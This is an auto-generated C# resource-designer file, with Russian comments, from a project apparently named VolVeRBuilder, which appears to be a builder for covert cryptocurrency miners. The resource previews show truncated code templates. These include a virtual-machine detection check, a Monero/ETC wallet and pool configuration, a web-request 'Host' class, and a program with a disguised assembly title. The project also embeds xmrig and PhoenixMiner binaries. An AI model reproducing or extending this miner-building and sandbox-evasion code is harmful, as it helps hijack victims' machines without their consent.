//------------------------------------------------------------------------------
// <auto-generated>
//     Этот код создан программой.
//     Исполняемая версия:4.0.30319.42000
//
//     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
//     повторной генерации кода.
// </auto-generated>
//------------------------------------------------------------------------------

namespace VolVeRBuilder.Properties {
    using System;
    
    
    /// <summary>
    ///   Класс ресурса со строгой типизацией для поиска локализованных строк и т.д.
    /// </summary>
    // Этот класс создан автоматически классом StronglyTypedResourceBuilder
    // с помощью такого средства, как ResGen или Visual Studio.
    // Чтобы добавить или удалить член, измените файл .ResX и снова запустите ResGen
    // с параметром /str или перестройте свой проект VS.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Возвращает кэшированный экземпляр ResourceManager, использованный этим классом.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("VolVeRBuilder.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Перезаписывает свойство CurrentUICulture текущего потока для всех
        ///   обращений к ресурсу с помощью этого класса ресурса со строгой типизацией.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на using System.Management;
        ///using System;
        ///using System.Net.NetworkInformation;
        ///using System.Runtime.InteropServices;
        ///
        ///namespace MinerAns
        ///{
        ///   
        ///
        ///
        ///    public class Analysis
        ///    {
        ///        public static bool isVirtualMachine()
        ///        {
        ///            const string MICROSOFTCORPORATION = &quot;microsoft corporation&quot;;
        ///            const string VMWARE = &quot;vmware&quot;;
        ///
        ///            foreach (var item in new ManagementObjectSearcher(&quot;Select * from Win32_ComputerSystem&quot;).Get())
        ///            {
        ///                string m [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string Analysis {
            get {
                return ResourceManager.GetString("Analysis", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Поиск локализованного ресурса типа System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap apple_introduces_marijuana_emojis_for_your_iphone_213841_removebg_pview {
            get {
                object obj = ResourceManager.GetObject("apple-introduces-marijuana-emojis-for-your-iphone-213841-removebg-pview", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на using System;
        ///using System.Collections.Generic;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Text;
        ///using System.Threading.Tasks;
        ///
        ///namespace VolVeRFINAL
        ///{
        ///  
        ///        internal class config
        ///        {
        ///            public static string moneroUsage = &quot;25&quot;;
        ///            public static string moneroWallet = &quot;mnowallet&quot;;
        ///            public static string moneroPool = &quot;mnopool&quot;;
        ///            public static string etcWallet = &quot;etcwallet&quot;;
        ///            public static string etcPool = &quot;etcpool&quot;;
        ///            [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string config {
            get {
                return ResourceManager.GetString("config", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на using System;
        ///using System.Collections.Generic;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Management;
        ///using System.Net;
        ///using System.Security.Principal;
        ///using System.Text;
        ///using System.Threading.Tasks;
        ///
        ///namespace VolVeRFINAL
        ///{
        ///    class Host
        ///    {
        ///
        ///        private static string adm = &quot;isfislalwidaq&quot;;
        ///
        ///        public static string get(string url)
        ///        {
        ///            try
        ///            {
        ///                WebRequest request = WebRequest.Create(url);
        ///                request.Credential [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string Host {
            get {
                return ResourceManager.GetString("Host", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Поиск локализованного ресурса типа System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap image_reovebg_preview {
            get {
                object obj = ResourceManager.GetObject("image-reovebg-preview", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Поиск локализованного ресурса типа System.Byte[].
        /// </summary>
        internal static byte[] PhoenixMiner {
            get {
                object obj = ResourceManager.GetObject("PhoenixMiner", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на using Microsoft.Win32;
        ///using System;
        ///using System.Collections.Generic;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.Linq;
        ///using System.Management;
        ///using System.Reflection;
        ///using System.Runtime.InteropServices;
        ///using System.Security.Principal;
        ///using System.Text;
        ///using System.Text.RegularExpressions;
        ///using System.Threading;
        ///using System.Threading.Tasks;
        ///using System.IO.Compression;
        ///using System.Windows.Forms;
        ///using System.Security.Cryptography;
        ///
        ///
        ///[assembly: AssemblyTitle(&quot;UserAcc [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string Program {
            get {
                return ResourceManager.GetString("Program", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на //------------------------------------------------------------------------------
        ///// &lt;auto-generated&gt;
        /////     Этот код создан программой.
        /////     Исполняемая версия:4.0.30319.42000
        /////
        /////     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
        /////     повторной генерации кода.
        ///// &lt;/auto-generated&gt;
        /////------------------------------------------------------------------------------
        ///
        ///namespace VolVeRFINAL.Properties {
        ///    using System;
        ///    
        ///    
        ///    /// &lt;summary&gt;
        ///    // [остаток строки не уместился]&quot;;.
        /// </summary>
        internal static string Resources_Designer {
            get {
                return ResourceManager.GetString("Resources_Designer", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Поиск локализованного ресурса типа System.Drawing.Icon, аналогичного (Значок).
        /// </summary>
        internal static System.Drawing.Icon thc {
            get {
                object obj = ResourceManager.GetObject("thc", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Поиск локализованного ресурса типа System.Byte[].
        /// </summary>
        internal static byte[] xmrig {
            get {
                object obj = ResourceManager.GetObject("xmrig", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
